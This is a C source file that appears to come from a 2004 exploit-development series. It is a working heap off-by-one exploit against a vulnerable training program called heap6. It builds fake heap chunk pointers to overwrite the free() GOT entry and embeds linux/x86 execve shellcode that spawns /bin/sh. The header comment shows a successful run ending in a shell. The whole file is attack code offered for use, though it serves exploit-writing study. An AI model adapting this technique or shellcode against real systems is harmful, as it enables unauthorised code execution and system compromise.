/*
 * $Id: heap6-ex2.c,v 1.1 2004/06/02 12:15:03 raptor Exp $
 *
 * heap6-ex2.c - heap6.c exploit (heap-based off-by-one)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit uses the heap-based off-by-one technique outlined in the
 * http://www.thc.org/root/docs/exploit_writing/heap_off_by_one.txt paper
 * by qitest1 <qitest1@bespin.org>. This time we return into the heap, to
 * bypass the Openwall non-exec stack protection.
 *
 * Tested on both vanilla Linux and Linux/Openwall systems.
 *
 * Structure of buf1: ["A"x12]
 * Structure of buf2: [free_addr - 12] [ret]
 *
 * raptor@dns:~/devel$ uname -a
 * Linux dns 2.2.26-ow1 #1 Tue Mar 2 10:22:13 CET 2004 i686 unknown
 * raptor@dns:~/devel$ gcc --version
 * 2.95.3
 * raptor@dns:~/devel$ ./heap6-ex2
 * Using ret address       : 0x8049930
 * Using 2nd buf address   : 0x8049928
 * Using free() address    : 0x8049850
 * 
 * len0: 12
 * len1: 44
 * p0 -> 0x8049918
 * p1 -> 0x8049928
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 49 (0x31)
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 0 ((nil))	<- the off-by-one sets the size to 0
 * sh-2.05$ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	VULN		"./heap6"	// the vulnerable program
#define BUF1SIZE	12 + 1		// size of buf1
#define BUF2SIZE	1024		// max size of buf2
#define FREE		0x08049850	// free() address in .got
#define	MALLOC		0x08049928	// address of the second buffer

char sc[] = /* linux/x86 shellcode (12 + 24 = 36 bytes) */
"\xeb\x0aWHO_CARES?"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf1[BUF1SIZE], buf2[BUF2SIZE];
	char	*p = buf2;

	int	free_addr = FREE;
	int	ret = MALLOC + 8;

	/* prepare buf1 */
	memset(buf1, 'A', sizeof(buf1));
	buf1[sizeof(buf1) - 1] = 0x0;

	/* prepare buf2 */
	bzero(buf2, sizeof(buf2));
	*((void **)p) = (void *)(free_addr - 12);	/* fd field */
	p += 4;
	*((void **)p) = (void *)(ret);			/* bk field */
	p += 4;
	memcpy(p, sc, sizeof(sc) - 1);			/* shellcode */

	/* print some output */
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using 2nd buf address\t: %p\n", MALLOC);
	fprintf(stderr, "Using free() address\t: %p\n\n", free_addr);

	/* run the vulnerable program */
	execl(VULN, VULN + 2, buf1, buf2, NULL);
	perror("execl");
}
